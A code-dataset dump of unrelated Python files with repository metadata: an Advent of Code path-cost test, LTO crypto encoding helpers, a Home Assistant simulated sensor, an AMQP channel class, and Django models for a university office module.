pq.put((new_cost, (x + dx, y + dy)))
D[(x + dx, y + dy)] = new_cost
if x + dx == len(m) - 1 and y + dy == len(m) - 1:
return new_cost
def test_th_ch():
"""
Run `python -m pytest ./day-15/part-1/th-ch.py` to test the submission.
"""
assert (
ThChSubmission().run(
"""
1163751742
1381373672
2136511328
3694931569
7463417111
1319128137
1359912421
3125421639
1293138521
2311944581
""".strip()
)
== 40
)
| 26.590164
| 80
| 0.451295
|
e62b5080bbeda124023abebade836b7ac8272b64
| 2,421
|
py
|
Python
|
src/lto/crypto.py
|
mustafa-travisci/lto-api.python
|
0493a46b69575e94d09a038dadf472b46f88d036
|
[
"MIT"
] | null | null | null |
src/lto/crypto.py
|
mustafa-travisci/lto-api.python
|
0493a46b69575e94d09a038dadf472b46f88d036
|
[
"MIT"
] | null | null | null |
src/lto/crypto.py
|
mustafa-travisci/lto-api.python
|
0493a46b69575e94d09a038dadf472b46f88d036
|
[
"MIT"
] | null | null | null |
import base64
import hashlib
import pyblake2
import base58
import inflection
import struct
str2bytes = lambda s: s.encode('latin-1')
bytes2str = lambda b: ''.join(map(chr, b))
str2list = lambda s: [c for c in s]
def sha256(s):
return hashlib.sha256(str2bytes(s)).digest()
def hash_chain(s):
a = pyblake2.blake2b(s, digest_size=32).digest()
b = hashlib.sha256(a).digest()
return ''.join(map(chr, b))
def get_network(address):
decoded_address = base58.b58decode(address)
return str(decoded_address)[6]
def recode(string, from_encoding, to_encoding):
binary = decode(string, from_encoding)
return encode(binary, to_encoding)
def decode(string, encoding: str):
if encoding == 'base58':
return base58.b58decode(string)
elif encoding == 'base64':
return base64.b64decode(string)
elif encoding == 'hex':
return bytes.fromhex(string)
else:
raise Exception('Failed to decode')
def encode(string, encoding: str):
if encoding == 'base58':
return base58.b58encode(string)
elif encoding == 'base64':
return base64.b64encode(string)
elif encoding == 'hex':
return string.hex()
else:
raise Exception('Failed to encode')
def validate_address(address):
ADDRESS_VERSION = 1
ADDRESS_CHECKSUM_LENGTH = 4
ADDRESS_HASH_LENGTH = 20
ADDRESS_LENGTH = 1 + 1 + ADDRESS_CHECKSUM_LENGTH + ADDRESS_HASH_LENGTH
addr = bytes2str(base58.b58decode(address))
if addr[0] != chr(ADDRESS_VERSION):
raise Exception('Wrong address version')
elif len(addr) != ADDRESS_LENGTH:
raise Exception('Wrong address length')
elif addr[-ADDRESS_CHECKSUM_LENGTH:] != hash_chain(
str2bytes(addr[:-ADDRESS_CHECKSUM_LENGTH]))[:ADDRESS_CHECKSUM_LENGTH]:
raise Exception('Wrong address checksum')
else:
return True
def key_type_id(key_type):
if key_type == 'ed25519':
return b'\1'
elif key_type == 'secp256k1':
return b'\2'
elif key_type == 'secp256r1':
return b'\3'
elif key_type == 'rsa':
return b'\4'
else:
raise Exception('Key Type not supported')
def merge_dicts(x, y):
z = x.copy()
z.update(y)
return z
def compare_data_transaction(data, transaction):
for key in data:
key2 = inflection.underscore(key)
assert data[key] == getattr(transaction, key2)
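if __name__ == "__main__":
    # Hypothetical round-trip check, not in the original module: re-encode a hex
    # string as base64 and back through the helpers defined above.
    assert recode('48656c6c6f', 'hex', 'base64') == base64.b64encode(b'Hello')
    assert decode(encode(b'Hello', 'hex'), 'hex') == b'Hello'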
| 25.21875
| 82
| 0.658819
|
ddd5d99ac97893870538a5f6e8dcc23210f2ce51
| 4,845
|
py
|
Python
|
homeassistant/components/simulated/sensor.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
homeassistant/components/simulated/sensor.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
homeassistant/components/simulated/sensor.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""Adds a simulated sensor."""
from __future__ import annotations
from datetime import datetime
import math
from random import Random
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.const import CONF_NAME
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
import homeassistant.util.dt as dt_util
CONF_AMP = "amplitude"
CONF_FWHM = "spread"
CONF_MEAN = "mean"
CONF_PERIOD = "period"
CONF_PHASE = "phase"
CONF_SEED = "seed"
CONF_UNIT = "unit"
CONF_RELATIVE_TO_EPOCH = "relative_to_epoch"
DEFAULT_AMP = 1
DEFAULT_FWHM = 0
DEFAULT_MEAN = 0
DEFAULT_NAME = "simulated"
DEFAULT_PERIOD = 60
DEFAULT_PHASE = 0
DEFAULT_SEED = 999
DEFAULT_UNIT = "value"
DEFAULT_RELATIVE_TO_EPOCH = True
ICON = "mdi:chart-line"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_AMP, default=DEFAULT_AMP): vol.Coerce(float),
vol.Optional(CONF_FWHM, default=DEFAULT_FWHM): vol.Coerce(float),
vol.Optional(CONF_MEAN, default=DEFAULT_MEAN): vol.Coerce(float),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PERIOD, default=DEFAULT_PERIOD): cv.positive_int,
vol.Optional(CONF_PHASE, default=DEFAULT_PHASE): vol.Coerce(float),
vol.Optional(CONF_SEED, default=DEFAULT_SEED): cv.positive_int,
vol.Optional(CONF_UNIT, default=DEFAULT_UNIT): cv.string,
vol.Optional(
CONF_RELATIVE_TO_EPOCH, default=DEFAULT_RELATIVE_TO_EPOCH
): cv.boolean,
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the simulated sensor."""
name = config.get(CONF_NAME)
unit = config.get(CONF_UNIT)
amp = config.get(CONF_AMP)
mean = config.get(CONF_MEAN)
period = config.get(CONF_PERIOD)
phase = config.get(CONF_PHASE)
fwhm = config.get(CONF_FWHM)
seed = config.get(CONF_SEED)
relative_to_epoch = config.get(CONF_RELATIVE_TO_EPOCH)
sensor = SimulatedSensor(
name, unit, amp, mean, period, phase, fwhm, seed, relative_to_epoch
)
add_entities([sensor], True)
class SimulatedSensor(SensorEntity):
"""Class for simulated sensor."""
def __init__(
self, name, unit, amp, mean, period, phase, fwhm, seed, relative_to_epoch
):
"""Init the class."""
self._name = name
self._unit = unit
self._amp = amp
self._mean = mean
self._period = period
self._phase = phase # phase in degrees
self._fwhm = fwhm
self._seed = seed
self._random = Random(seed) # A local seeded Random
self._start_time = (
datetime(1970, 1, 1, tzinfo=dt_util.UTC)
if relative_to_epoch
else dt_util.utcnow()
)
self._relative_to_epoch = relative_to_epoch
self._state = None
def time_delta(self):
"""Return the time delta."""
dt0 = self._start_time
dt1 = dt_util.utcnow()
return dt1 - dt0
def signal_calc(self):
"""Calculate the signal."""
mean = self._mean
amp = self._amp
        time_delta = self.time_delta().total_seconds() * 1e6  # seconds -> microseconds
        period = self._period * 1e6  # seconds -> microseconds
fwhm = self._fwhm / 2
phase = math.radians(self._phase)
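        # Comment added for clarity; the value produced below is
        #   mean + amplitude * sin(2*pi * dt / period + phase) + N(0, spread / 2)
        # where dt is the time elapsed since the sensor's start time.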
if period == 0:
periodic = 0
else:
periodic = amp * (math.sin((2 * math.pi * time_delta / period) + phase))
noise = self._random.gauss(mu=0, sigma=fwhm)
return round(mean + periodic + noise, 3)
async def async_update(self):
"""Update the sensor."""
self._state = self.signal_calc()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def native_value(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return ICON
@property
def native_unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._unit
@property
def extra_state_attributes(self):
"""Return other details about the sensor state."""
return {
"amplitude": self._amp,
"mean": self._mean,
"period": self._period,
"phase": self._phase,
"spread": self._fwhm,
"seed": self._seed,
"relative_to_epoch": self._relative_to_epoch,
}
| 30.28125
| 84
| 0.6516
|
8200064181b798609c4bfc5d935b29af3aa9ae47
| 4,641
|
py
|
Python
|
haigha/classes/channel_class.py
|
ask/haigha
|
1f87bbb37371f5ae6212c5af32ab4e8c5cebe34c
|
[
"BSD-3-Clause"
] | 1
|
2022-02-18T05:41:30.000Z
|
2022-02-18T05:41:30.000Z
|
haigha/classes/channel_class.py
|
ask/haigha
|
1f87bbb37371f5ae6212c5af32ab4e8c5cebe34c
|
[
"BSD-3-Clause"
] | null | null | null |
haigha/classes/channel_class.py
|
ask/haigha
|
1f87bbb37371f5ae6212c5af32ab4e8c5cebe34c
|
[
"BSD-3-Clause"
] | null | null | null |
from haigha.classes import ProtocolClass
from haigha.frames import MethodFrame
from haigha.writer import Writer
class ChannelClass(ProtocolClass):
'''
Implements the AMQP Channel class
'''
def __init__(self, *args, **kwargs):
super(ChannelClass, self).__init__(*args, **kwargs)
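    # Comment added for clarity: AMQP channel-class (class id 20) method ids
    # handled here are 11 = open-ok, 20 = flow, 21 = flow-ok, 40 = close and
    # 41 = close-ok.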
self.dispatch_map = {
11 : self._recv_open_ok,
20 : self._recv_flow,
21 : self._recv_flow_ok,
40 : self._recv_close,
41 : self._recv_close_ok,
}
self._closed = False
self._close_info = {
'reply_code' : 0,
'reply_text' : 'first connect',
'class_id' : 0,
'method_id' : 0
}
self._active = True
self._flow_control_cb = None
@property
def closed(self):
'''Return whether this channel has been closed.'''
return self._closed
@property
def close_info(self):
'''Return dict with information on why this channel is closed. Will
return None if the channel is open.'''
return self._close_info if self._closed else None
@property
def active(self):
'''
Return True if flow control turned off, False if flow control is on.
'''
return self._active
def set_flow_cb(self, cb):
'''
Set a callback that will be called when the state of flow control has changed.
The caller should use closures if they need to receive a handle to the channel
on which flow control changes.
'''
self._flow_control_cb = cb
def open(self):
'''
Open the channel for communication.
'''
args = Writer()
args.write_shortstr('')
self.send_frame( MethodFrame(self.channel_id, 20, 10, args) )
self.channel.add_synchronous_cb( self._recv_open_ok )
def _recv_open_ok(self, method_frame):
pass
def activate(self):
'''
Activate this channel (disable flow control).
'''
if not self._active:
self._send_flow( True )
def deactivate(self):
'''
Deactivate this channel (enable flow control).
'''
if self._active:
self._send_flow( False )
def _send_flow(self, active):
'''
Send a flow control command.
'''
args = Writer()
args.write_bit( active )
self.send_frame( MethodFrame(self.channel_id, 20, 20, args) )
self.channel.add_synchronous_cb( self._recv_flow_ok )
def _recv_flow(self, method_frame):
'''
Receive a flow control command from the broker
'''
self._active = method_frame.args.read_bit()
args = Writer()
args.write_bit( self._active )
self.send_frame( MethodFrame(self.channel_id, 20, 21, args) )
if self._flow_control_cb is not None:
self._flow_control_cb()
def _recv_flow_ok(self, method_frame):
'''
Receive a flow control ack from the broker.
'''
self._active = method_frame.args.read_bit()
if self._flow_control_cb is not None:
self._flow_control_cb()
def close(self, reply_code=0, reply_text='', class_id=0, method_id=0):
'''
Close this channel. Caller has the option of specifying the reason for
closure and the class and method ids of the current frame in which an error
occurred. If in the event of an exception, the channel will be marked
as immediately closed. If channel is already closed, call is ignored.
'''
if self._closed: return
self._close_info = {
'reply_code' : reply_code,
'reply_text' : reply_text,
'class_id' : class_id,
'method_id' : method_id
}
try:
args = Writer()
args.write_short( reply_code )
args.write_shortstr( reply_text )
args.write_short( class_id )
args.write_short( method_id )
self.send_frame( MethodFrame(self.channel_id, 20, 40, args) )
self.channel.add_synchronous_cb( self._recv_close_ok )
except:
self.logger.error("Failed to close channel %d",
self.channel_id, exc_info=True)
# Immediately set the closed flag so that no more frames can be sent
self._closed = True
def _recv_close(self, method_frame):
'''
Receive a close command from the broker.
'''
self._close_info = {
'reply_code' : method_frame.args.read_short(),
'reply_text' : method_frame.args.read_shortstr(),
'class_id' : method_frame.args.read_short(),
'method_id' : method_frame.args.read_short()
}
self.send_frame( MethodFrame(self.channel_id, 20, 41) )
# Must set this *after* send_frame so that it doesn't throw an exception
self._closed = True
def _recv_close_ok(self, method_frame):
'''
Receive a close ack from the broker.
'''
self._closed = True
| 27.790419
| 82
| 0.653307
|
318e662b8b2eebe70758232791dfea2c111ea320
| 20,470
|
py
|
Python
|
FusionIIIT/applications/office_module/models.py
|
pTidke/Fusion
|
7a0da7239bd97df7a9849163c5438c0c917c2e55
|
[
"bzip2-1.0.6"
] | 1
|
2020-01-16T17:06:22.000Z
|
2020-01-16T17:06:22.000Z
|
FusionIIIT/applications/office_module/models.py
|
rishi2907/Fusion
|
7a0da7239bd97df7a9849163c5438c0c917c2e55
|
[
"bzip2-1.0.6"
] | null | null | null |
FusionIIIT/applications/office_module/models.py
|
rishi2907/Fusion
|
7a0da7239bd97df7a9849163c5438c0c917c2e55
|
[
"bzip2-1.0.6"
] | null | null | null |
import datetime
from django.db import models
from applications.academic_information.models import (Course, Grades,
Instructor, Meeting, Spi,
Student)
from applications.academic_procedures.models import Thesis
from applications.filetracking.models import Tracking
from applications.globals.models import (DepartmentInfo, Designation,
ExtraInfo, Faculty, HoldsDesignation,
Staff)
from applications.leave.models import Leave
from .models_office_students import *
from applications.filetracking.models import File
class Constants:
DAY_CHOICES = (
('Monday', 'Monday'),
('Tuesday', 'Tuesday'),
('Wednesday', 'Wednesday'),
('Thursday', 'Thursday'),
('Friday', 'Friday'),
)
ACTION = (
('forward', 'forwarded'),
('revert', 'revert'),
('accept', 'accept'),
('reject', 'reject')
)
STATUS = (
('0', 'unseen'),
('1', 'seen')
)
APPROVAL = (
('0', 'reject'),
('1', 'accept')
)
APPROVAL_TYPE = (
('APPROVED', 'Approved'),
('PENDING', 'Pending'),
)
HALL_NO = (
('HALL-1','hall-1'),
('HALL-3','hall-3'),
('HALL-4','hall-4'),
)
DEPARTMENT=(
('civil','civil'),
('electrical','electrical')
)
BUILDING=(
('corelab','corelab'),
('computer center','computer center'),
('hostel','hostel'),
('mess','mess'),
('library','library'),
('cc','cc')
)
STATUS_CHOICES = (
('Forward', 'FORWARD'),
('Accept', 'ACCEPT')
)
PROJECT_TYPE = (
('SRes', 'Sponsored Research'),
('Consultancy', 'Consultancy'),
('Testing', 'Testing')
)
RESPONSE_TYPE = (
('Approve', 'Approve'),
('Disapprove', 'Disapprove'),
('Pending' , 'Pending')
)
RESPONSE_TYPE1 = (
('Forwarded', 'Forwarded'),
('Pending' , 'Pending')
)
TICK_TYPE = (
        ('YES', 'YES'),
('NO', 'NO')
)
PROJECT_OPERATED = (
('PI', 'Only by PI'),
('any', 'Either PI or CO-PI')
)
TRAVEL_CHOICES = (
('road', 'ROAD'),
('rail', 'RAIL')
)
TICK_TYPE = (
('Computer Graphics', 'Computer Graphics'),
('Machine Learning', 'Machine Learning'),
('Image Processing','Image Processing'),
('Data Structure','Data Structure')
)
APPROVAL_TYPE = (
('APPROVED', 'Approved'),
('PENDING', 'Pending'),
)
PURCHASE_STATUS = (
('0', "Pending"),
('1', "Approve"),
('2', "Items Ordered"),
('3', "Items Puchased"),
('4', "Items Delivered"),
)
APPROVE_TAG = (
('0', "Pending"),
('1', "Approve"),
('-1',"Rejected"),
)
PURCHASE_TYPE = (
('0', "Amount < 25000"),
('1', "25000<Amount<250000"),
('2', "250000<Amount < 2500000"),
('3', "Amount>2500000"),
)
NATURE_OF_ITEM1 = (
('0', "Non-consumable"),
('1', "Consumable"),
)
NATURE_OF_ITEM2 = (
('0', "Equipment"),
('1', "Machinery"),
('2', "Furniture"),
('3', "Fixture"),
)
ITEM_TYPE = (
('0', "Non-consumable"),
('1', "Consumable"),
)
class Assistantship(models.Model):
student_id = models.ForeignKey(Student, on_delete=models.CASCADE)
instructor_id = models.ForeignKey(Instructor, on_delete=models.CASCADE)
file = models.FileField(upload_to='documents/',blank=True,null=True)
action = models.IntegerField(default=0)
    comments = models.CharField(null=True, blank=True, max_length=150)
class Meta:
db_table = 'Assistantship'
unique_together = ('student_id','instructor_id')
def __str__(self):
return '{} - {}'.format(self.student_id, self.instructor_id)
# Dean RSPC Begins ....................................................................................................
"""
DEAN RSPC BEGINS
Table for Project Registration
"""
class Project_Registration(models.Model):
PI_id = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
project_title = models.CharField(max_length=200)
sponsored_agency = models.CharField(max_length=100)
CO_PI = models.CharField(max_length=100, null=True)
start_date = models.DateField(null=True, blank=True)
duration = models.IntegerField(default=0)
agreement = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='NO')
amount_sanctioned = models.IntegerField(default=0)
project_type = models.CharField(choices=Constants.PROJECT_TYPE,
max_length=25)
project_operated = models.CharField(choices=Constants.PROJECT_OPERATED,
max_length=50, default='me')
remarks = models.CharField(max_length=200)
fund_recieved_date = models.DateField(null=True, blank=True)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
applied_date = models.DateField(null=True, blank=True)
description = models.CharField(max_length=200, null=True)
file = models.FileField(upload_to='documents/', blank=True, null=True)
def __str__(self):
return self.project_title
"""
DEAN RSPC
Table for Project Extension
"""
class Project_Extension(models.Model):
project_id = models.ForeignKey(Project_Registration, on_delete=models.CASCADE)
date = models.DateField(null=True, blank=True)
extended_duration = models.IntegerField(default=0)
extension_details = models.CharField(max_length=300)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
file = models.FileField(upload_to='documents/', blank=True, null=True)
def __str__(self):
return str(self.project_id)
"""
DEAN RSPC
Table for Project Closure
"""
class Project_Closure(models.Model):
project_id = models.ForeignKey(Project_Registration, on_delete=models.CASCADE)
completion_date = models.DateField(null=True, blank=True)
# extended_duration = models.CharField(max_length=200, blank=True, null=True)
date = models.DateField(null=True, blank=True)
expenses_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
expenses_dues_description = models.CharField(max_length=200, blank=True, null=True)
payment_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
payment_dues_description = models.CharField(max_length=200, blank=True, null=True)
salary_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
salary_dues_description = models.CharField(max_length=200, blank=True, null=True)
advances_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
advances_description = models.CharField(max_length=200, blank=True, null=True)
others_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
other_dues_description = models.CharField(max_length=200, blank=True, null=True)
overhead_deducted = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
overhead_description = models.CharField(max_length=200, blank=True, null=True)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
remarks = models.CharField(max_length=300, null=True)
extended_duration = models.CharField(default='0', max_length=100, null=True)
def __str__(self):
return str(self.project_id)
"""
DEAN RSPC
Table for Project Reallocation
"""
class Project_Reallocation(models.Model):
project_id = models.ForeignKey(Project_Registration, on_delete=models.CASCADE)
date = models.DateField(null=True, blank=True)
previous_budget_head = models.CharField(max_length=300)
previous_amount = models.IntegerField(default=0)
pf_no = models.CharField(max_length=100, null=True)
new_budget_head = models.CharField(max_length=300)
new_amount = models.IntegerField(default=0)
transfer_reason = models.CharField(max_length=300)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
def __str__(self):
return str(self.project_id)
# Dean RSPC ends ....................................................................................................
class Member(models.Model):
    member_id = models.ForeignKey(Faculty, on_delete=models.CASCADE)
    meeting_id = models.ForeignKey(Meeting, on_delete=models.CASCADE)
class Meta:
db_table = 'Member'
unique_together = (('member_id', 'meeting_id'))
def __str__(self):
return str(self.member_id)
class Registrar(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.CharField(max_length=1, choices=Constants.STATUS, default=0)
file = models.FileField()
class Requisitions(models.Model):
userid=models.ForeignKey(ExtraInfo,on_delete=models.CASCADE)
req_date=models.DateTimeField(auto_now_add=True)
title=models.CharField(max_length=50)
department=models.CharField(max_length=50,choices=Constants.DEPARTMENT)
building=models.CharField(max_length=50,choices=Constants.BUILDING)
description=models.CharField(max_length=200)
assign_file=models.ForeignKey(File, on_delete=models.CASCADE, null=True)
tag=models.IntegerField(default=0) # 0: accepted 1: rejected
def __str__(self):
return str(self.id)
class Filemovement(models.Model):
rid=models.ForeignKey(Requisitions,on_delete=models.CASCADE)
sentby=models.ForeignKey(HoldsDesignation,on_delete=models.CASCADE,related_name='sent_by')
receivedby=models.ForeignKey(HoldsDesignation,on_delete=models.CASCADE,related_name='received_by')
date=models.DateTimeField(auto_now_add=True)
remarks=models.CharField(max_length=200,null=True)
actionby_receiver=models.CharField(max_length=50,choices=Constants.ACTION)
class vendor(models.Model):
vendor_name = models.CharField(max_length=100)
vendor_address = models.CharField(max_length=200)
vendor_item = models.CharField(max_length=200)
class Meta:
db_table = 'vendor'
class apply_for_purchase(models.Model):
indentor_name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='indentor_name')
# designation = models.ForeignKey(Designation, on_delete=models.CASCADE)
inspecting_authority = models.CharField(max_length=200, default='0')
expected_purchase_date = models.DateField()
order_date = models.DateField(default=datetime.date.today)
    purchase_status = models.IntegerField(choices=Constants.PURCHASE_STATUS, default=0)
# purchase_officer = models.ForeignKey(Staff, on_delete=models.CASCADE, default='0')
amount = models.IntegerField(default='0')
purchase_date = models.DateField(default='2018-06-01')
    registrar_approve_tag = models.IntegerField(choices=Constants.APPROVE_TAG, default=0)
    director_approve_tag = models.IntegerField(choices=Constants.APPROVE_TAG, default=0)
    HOD_approve_tag = models.IntegerField(choices=Constants.APPROVE_TAG, default=0)
    accounts_approve_tag = models.IntegerField(choices=Constants.APPROVE_TAG, default=0)
    gem_tag = models.IntegerField(choices=Constants.APPROVE_TAG, default=0)
    purchase_type = models.IntegerField(choices=Constants.PURCHASE_TYPE, default=0)
purpose = models.CharField(max_length=200, default=0)
budgetary_head = models.CharField(max_length=200, default=0)
invoice = models.FileField(default=0)
    nature_of_item1 = models.IntegerField(choices=Constants.NATURE_OF_ITEM1, default=0)
    nature_of_item2 = models.IntegerField(choices=Constants.NATURE_OF_ITEM2, default=0)
item_name = models.CharField(max_length=100, default=0)
expected_cost = models.IntegerField(default=0)
quantity = models.IntegerField(default=0)
class Meta:
db_table = 'apply_for_purchase'
class stock(models.Model):
item_name = models.CharField(max_length=100)
quantity = models.IntegerField(default='0')
    item_type = models.IntegerField(choices=Constants.ITEM_TYPE, default='0')
class Meta:
db_table = 'stock'
class purchase_commitee(models.Model) :
local_comm_mem1 = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='local_comm_mem1')
local_comm_mem2 = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='local_comm_mem2')
local_comm_mem3 = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='local_comm_mem3')
    approve_mem1 = models.IntegerField(choices=Constants.APPROVE_TAG, default='0')
    approve_mem2 = models.IntegerField(choices=Constants.APPROVE_TAG, default='0')
    approve_mem3 = models.IntegerField(choices=Constants.APPROVE_TAG, default='0')
class Meta:
db_table = 'purchase_commitee'
class quotations(models.Model) :
quotation1 = models.FileField()
quotation2 = models.FileField()
quotation3 = models.FileField()
class Meta:
db_table = 'quotations'
class Registrar_File(models.Model):
file_id = models.ForeignKey(Tracking, on_delete=models.CASCADE)
status = models.IntegerField(choices=Constants.STATUS, default=0)
approval = models.IntegerField(choices=Constants.APPROVAL, default=0)
section_name = models.CharField(max_length=50)
section_type = models.CharField(max_length=20)
class registrar_create_doc(models.Model):
file_name = models.CharField(max_length=50)
purpose = models.CharField(max_length=100)
Description = models.CharField(max_length=200)
file=models.FileField()
class registrar_director_section(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.CharField(max_length=1,choices=Constants.STATUS, default=0)
class registrar_purchase_sales_section(models.Model):
file_name = models.CharField(max_length=50)
member1 = models.CharField(max_length=50)
member2 = models.CharField(max_length=50)
member3 = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.IntegerField(choices=Constants.STATUS, default=0)
file = models.FileField()
class registrar_finance_section(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.IntegerField(choices=Constants.STATUS)
file = models.FileField()
class registrar_establishment_section(models.Model):
person_name = models.CharField(max_length=50)
person_mail_id = models.CharField(max_length=50,default="xyz")
date = models.DateField()
duration = models.IntegerField()
post = models.CharField(max_length=100)
file = models.FileField()
class registrar_general_section(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
amount = models.IntegerField()
status = models.IntegerField(choices=Constants.STATUS, default=0)
file = models.ForeignKey(registrar_create_doc, on_delete=models.CASCADE)
class LTC(models.Model):
name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
designation = models.ForeignKey(Designation, on_delete=models.CASCADE)
department = models.ForeignKey(DepartmentInfo, on_delete=models.CASCADE)
date_request = models.DateField()
leave = models.ForeignKey(Leave, on_delete=models.CASCADE)
    travel_mode = models.CharField(max_length=10, choices=Constants.TRAVEL_CHOICES, default='road')
advance = models.IntegerField(default=0)
family_details = models.TextField(max_length=500)
class Meta:
db_table = 'LTC'
def __str__(self):
return str(self.id)
class CPDA(models.Model):
name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
designation = models.ForeignKey(Designation, on_delete=models.CASCADE)
PF_no = models.CharField(max_length=100)
purpose = models.CharField(max_length=100)
    amount = models.IntegerField(default=0)
class Meta:
db_table = 'CPDA'
def __str__(self):
return str(self.id)
class Auto_fair_claim(models.Model):
name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
purpose = models.CharField(max_length=100)
amount = models.IntegerField(default=0)
auto_reg_no = models.CharField(max_length=50)
auto_contact = models.IntegerField(default=0)
bill = models.FileField(upload_to='hod/')
    date = models.DateField()
class Meta:
db_table = 'auto_fair_claim'
class Teaching_credits1(models.Model):
roll_no = models.CharField(max_length=100,primary_key=True)
name = models.CharField(max_length=100)
programme = models.CharField(max_length=100)
branch = models.CharField(max_length=100)
course1 = models.CharField(choices=Constants.TICK_TYPE,
max_length=100, default='NO')
course2 = models.CharField(choices=Constants.TICK_TYPE,
max_length=100, default='NO')
course3 = models.CharField(choices=Constants.TICK_TYPE,
max_length=100, default='NO')
tag = models.IntegerField(default=0)
class Meta:
db_table = 'Teaching_credits1'
def __str__(self):
return str(self.roll_no)
class Assigned_Teaching_credits(models.Model):
roll_no = models.ForeignKey(Teaching_credits1, on_delete=models.CASCADE)
assigned_course = models.CharField(max_length=100,default='NO')
class Meta:
db_table = 'Assigned_Teaching_credits'
class Lab(models.Model):
lab = models.CharField(max_length=10)
lab_instructor = models.CharField(max_length=30)
day = models.CharField(max_length=10,choices=Constants.DAY_CHOICES, default='Monday')
s_time = models.CharField(max_length=6, default='0:00')
e_time = models.CharField(max_length=6, default='0:00')
class Meta:
db_table = 'Lab'
def __str__(self):
return str(self.lab)
class TA_assign(models.Model):
roll_no = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE, related_name='TA_id')
lab = models.ForeignKey(Lab, on_delete=models.CASCADE)
balance = models.IntegerField(default=2)
class Meta:
db_table = 'TA_assign'
def __str__(self):
return str(self.id)
class Registrar_response(models.Model):
track_id = models.ForeignKey(Tracking, on_delete=models.CASCADE, related_name='t_id')
remark = models.CharField(max_length=50, default='')
status = models.CharField(max_length=20, default='')
class Meta:
db_table = 'Registrar_response'
def __str__(self):
        return str(self.id) + " " + str(self.track_id) + self.status
| 35.476603
| 120
| 0.650464
|
eaf88d293845dfd34442f77f6bc9214d7f6c1903
| 242
|
py
|
Python
|
gira_homeserver_api/devices/normalized_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 5
|
2020-03-17T12:45:50.000Z
|
2022-03-07T10:55:50.000Z
|
gira_homeserver_api/devices/normalized_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 3
|
2020-04-17T09:53:45.000Z
|
2021-01-25T22:14:14.000Z
|
gira_homeserver_api/devices/normalized_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 1
|
2020-04-17T06:51:50.000Z
|
2020-04-17T06:51:50.000Z
|
from .device import Device
class NormalizedDevice(Device):
def setValue(self, value):
if value >= 0 and value <= 1:
super().setValue(round(value * 100))
def getValue(self):
return super().getValue() / 100
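    # Usage note added for clarity (hypothetical example, not in the original
    # file): the device exposes a 0..1 scale while the underlying Device works
    # with 0..100, so setValue(0.5) forwards 50 and getValue() returns 0.5.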
| 26.888889
| 48
| 0.615702
|
15fc56151c00c72905359ab7d19b9e49e51d2941
| 28
|
py
|
Python
|
__init__.py
|
enyert/openacademy-project
|
76fb4fa9cd885d0b63f1091a67cc91bc1a3498c0
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
enyert/openacademy-project
|
76fb4fa9cd885d0b63f1091a67cc91bc1a3498c0
|
[
"Apache-2.0"
] | null | null | null |
